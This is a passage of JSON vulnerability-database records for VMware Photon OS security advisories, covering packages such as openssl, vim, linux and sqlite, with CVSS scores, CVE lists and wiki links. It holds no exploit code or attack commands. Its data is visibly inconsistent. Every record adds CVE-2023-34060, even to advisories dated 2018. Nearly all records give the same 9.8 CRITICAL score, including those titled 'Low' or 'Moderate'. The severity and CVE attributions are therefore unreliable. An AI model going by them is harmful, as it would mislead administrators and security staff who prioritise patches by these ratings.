"https://github.com/vmware/photon/wiki/Security-Update-3.0-298", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:51:02", "description": "Updates of ['libgcrypt'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-11-05T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2021-4.0-0124", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40528", "CVE-2023-34060"], "modified": "2021-11-05T00:00:00", "id": "PHSA-2021-4.0-0124", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-124", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:42:16", "description": "Updates of ['harfbuzz'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-02-23T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2023-4.0-0339", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-25193", "CVE-2023-34060"], "modified": "2023-02-23T00:00:00", "id": "PHSA-2023-4.0-0339", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-339", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:42:55", "description": "Updates of ['vim'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-01-31T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2023-4.0-0324", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-47024", "CVE-2023-34060"], "modified": "2023-01-31T00:00:00", "id": "PHSA-2023-4.0-0324", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-324", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T02:49:18", "description": "Updates of ['openssl'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-03-16T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-4.0-0162", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0778", "CVE-2023-34060"], "modified": "2022-03-16T00:00:00", "id": "PHSA-2022-4.0-0162", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-162", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T05:48:01", "description": "Updates of ['linux', 'linux-rt', 'linux-secure', 'linux-aws'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-02-22T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2023-4.0-0338", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4129", "CVE-2023-34060"], "modified": "2023-02-22T00:00:00", "id": "PHSA-2023-4.0-0338", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-338", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T03:04:26", "description": "Updates of ['python3'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-11-17T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-3.0-0489", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-45061", "CVE-2023-34060"], "modified": "2022-11-17T00:00:00", "id": "PHSA-2022-3.0-0489", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-489", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T05:37:25", "description": "Updates of ['linux', 'linux-rt', 'linux-esx', 'linux-secure'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-09-29T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2023-5.0-0103", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34060", "CVE-2023-42756"], "modified": "2023-09-29T00:00:00", "id": "PHSA-2023-5.0-0103", "href": "https://github.com/vmware/photon/wiki/Security-Update-5.0-103", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T05:37:31", "description": "Updates of ['linux', 'linux-rt', 'linux-esx', 'linux-secure'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-09-27T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2023-5.0-0102", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-34060", "CVE-2023-42755"], "modified": "2023-09-27T00:00:00", "id": "PHSA-2023-5.0-0102", "href": "https://github.com/vmware/photon/wiki/Security-Update-5.0-102", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T00:32:06", "description": "Updates of ['cifs-utils'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-05-14T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2021-0344", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20208", "CVE-2023-34060"], "modified": "2021-05-14T00:00:00", "id": "PHSA-2021-0344", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-344", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T00:32:45", "description": "Updates of ['nettle'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-04-21T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2021-0339", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20305", "CVE-2023-34060"], "modified": "2021-04-21T00:00:00", "id": "PHSA-2021-0339", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-339", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T00:12:14", "description": "Updates of ['libvirt'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-06-29T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-3.0-0261", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10161", "CVE-2023-34060"], "modified": "2021-06-29T00:00:00", "id": "PHSA-2021-3.0-0261", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-261", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T03:26:54", "description": "Updates of ['libtirpc'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-08-06T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-0504", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-46828", "CVE-2023-34060"], "modified": "2022-08-06T00:00:00", "id": "PHSA-2022-0504", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-504", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T06:22:41", "description": "Updates of ['linux', 'linux-secure', 'linux-aws'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-05-30T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2020-3.0-0098", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-20669", "CVE-2023-34060"], "modified": "2020-05-30T00:00:00", "id": "PHSA-2020-3.0-0098", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-98", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:00:41", "description": "Updates of ['postgresql13'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-02-10T00:00:00", "type": "photon", "title": "Low Photon OS Security Update - PHSA-2023-3.0-0531", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41862", "CVE-2023-34060"], "modified": "2023-02-10T00:00:00", "id": "PHSA-2023-3.0-0531", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-531", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T17:31:23", "description": "Updates of ['hwloc'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-09-01T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2023-5.0-0086", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-47022", "CVE-2023-34060"], "modified": "2023-09-01T00:00:00", "id": "PHSA-2023-5.0-0086", "href": "https://github.com/vmware/photon/wiki/Security-Update-5.0-86", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:36:19", "description": "Updates of ['sqlite'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-04-22T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2020-0234", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9327", "CVE-2023-34060"], "modified": "2020-04-22T00:00:00", "id": "PHSA-2020-0234", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-234", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:40:45", "description": "Updates of ['libssh2'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2019-03-29T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2019-0146", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-3855", "CVE-2023-34060"], "modified": "2019-03-29T00:00:00", "id": "PHSA-2019-0146", "href": "https://github.com/vmware/photon/wiki/Security-Update-2.0-146", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T19:02:39", "description": "Updates of ['systemd'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2018-03-19T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2018-0116", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18078", "CVE-2023-34060"], "modified": "2018-03-19T00:00:00", "id": "PHSA-2018-0116", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-116", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T19:01:37", "description": "Updates of ['unzip'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2018-06-01T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2018-0144", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000035", "CVE-2023-34060"], "modified": "2018-06-01T00:00:00", "id": "PHSA-2018-0144", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-144", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T19:01:19", "description": "Updates of ['linux', 'linux-esx'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2018-06-27T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2018-0153", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10853", "CVE-2023-34060"], "modified": "2018-06-27T00:00:00", "id": "PHSA-2018-0153", "href": "https://github.com/vmware/photon/wiki/Security-Update-1.0-153", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 